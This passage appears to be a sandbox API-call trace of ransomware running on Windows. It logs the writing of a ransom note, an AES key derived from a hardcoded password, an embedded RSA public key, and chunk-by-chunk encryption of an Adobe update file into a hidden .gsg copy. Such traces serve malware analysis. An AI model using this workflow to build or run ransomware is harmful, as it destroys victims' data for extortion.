returned 1 [0141.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5c4d40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0141.279] CreateFileW (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.009.20058\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.009.20058\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0141.280] GetFileType (hFile=0x5d58) returned 0x1 [0141.280] WriteFile (in: hFile=0x5d58, lpBuffer=0x2c5db94*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5db8c, lpOverlapped=0x0 | out: lpBuffer=0x2c5db94*, lpNumberOfBytesWritten=0x2c5db8c*=0x5ec, lpOverlapped=0x0) returned 1 [0141.281] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f160 | out: lpFindFileData=0x2c5f160) returned 1 [0141.281] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\*.*", lpFindFileData=0x2c5edc4 | out: lpFindFileData=0x2c5edc4) returned 0x27fed18 [0141.527] FindNextFileA (in: hFindFile=0x27fed18, lpFindFileData=0x2c5edc4 | out: lpFindFileData=0x2c5edc4) returned 1 [0141.527] FindNextFileA (in: hFindFile=0x27fed18, lpFindFileData=0x2c5edc4 | out: lpFindFileData=0x2c5edc4) returned 1 [0141.527] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5ecd4 | out: lpSystemTimeAsFileTime=0x2c5ecd4) [0141.527] GetLastError () returned 0x0 [0141.527] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.012.20098\\acrordrdcupd1800920044_incr.msp")) returned 0x20 [0141.531] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp", dwFileAttributes=0x80) returned 1 [0141.531] CreateFileA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.012.20098\\acrordrdcupd1800920044_incr.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0141.532] CreateFileA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp.gsg" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.012.20098\\acrordrdcupd1800920044_incr.msp.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d74 [0141.532] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp.gsg", dwFileAttributes=0x2) returned 1 [0141.533] CryptAcquireContextA (in: phProv=0x2c5dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5dcd0*=0x2813950) returned 1 [0141.546] CryptCreateHash (in: hProv=0x2813950, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5dcd4 | out: phHash=0x2c5dcd4) returned 1 [0141.546] lstrlenA (lpString="qCzPOYIfMqMxshdEtSqiohlizMlQm") returned 29 [0141.546] CryptHashData (hHash=0x27fed58, pbData=0x2874778, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0141.546] CryptDeriveKey (in: hProv=0x2813950, Algid=0x6610, hBaseData=0x27fed58, dwFlags=0x1000000, phKey=0x2c5dcc0 | out: phKey=0x2c5dcc0*=0x27fee18) returned 1 [0141.546] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5dcdc, pcbBinary=0x2c5dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5dcdc, pcbBinary=0x2c5dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0141.546] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5dcb0, pcbStructInfo=0x2c5dcb8 | out: pvStructInfo=0x2c5dcb0, pcbStructInfo=0x2c5dcb8) returned 1 [0141.546] CryptAcquireContextA (in: phProv=0x2c5dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5dccc*=0x2813840) returned 1 [0141.567] CryptImportPublicKeyInfo (in: hCryptProv=0x2813840, dwCertEncodingType=0x1, pInfo=0x2818468*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2818498*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28184a0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5dcc4 | out: phKey=0x2c5dcc4*=0x27feb18) returned 1 [0141.567] CryptEncrypt (in: hKey=0x27feb18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5dcb4*=0x80) returned 1 [0141.567] CryptEncrypt (in: hKey=0x27feb18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2812fc0*, pdwDataLen=0x2c5dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2812fc0*, pdwDataLen=0x2c5dcc8*=0x80) returned 1 [0141.567] WriteFile (in: hFile=0x5d74, lpBuffer=0x2812fc0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2812fc0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x80, lpOverlapped=0x0) returned 1 [0141.568] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.890] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.890] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.916] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.916] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.916] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.916] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.916] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.916] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.916] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.916] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.917] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.917] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.933] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.933] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.933] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.934] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.934] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.934] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.934] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.934] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.934] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.934] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.934] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.934] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.934] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.934] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.935] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.935] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.935] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.935] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.935] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.935] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.935] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.935] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.935] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.936] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.936] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.936] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.936] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.936] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.936] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.936] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.936] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.936] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.936] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.936] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.936] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.937] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.937] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.937] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.937] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.937] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.937] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.937] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.937] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.937] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.937] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.938] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.938] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.938] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.938] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.938] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.938] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.938] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.938] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.938] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.938] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.938] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.939] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.939] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.939] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.939] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.939] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.939] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: 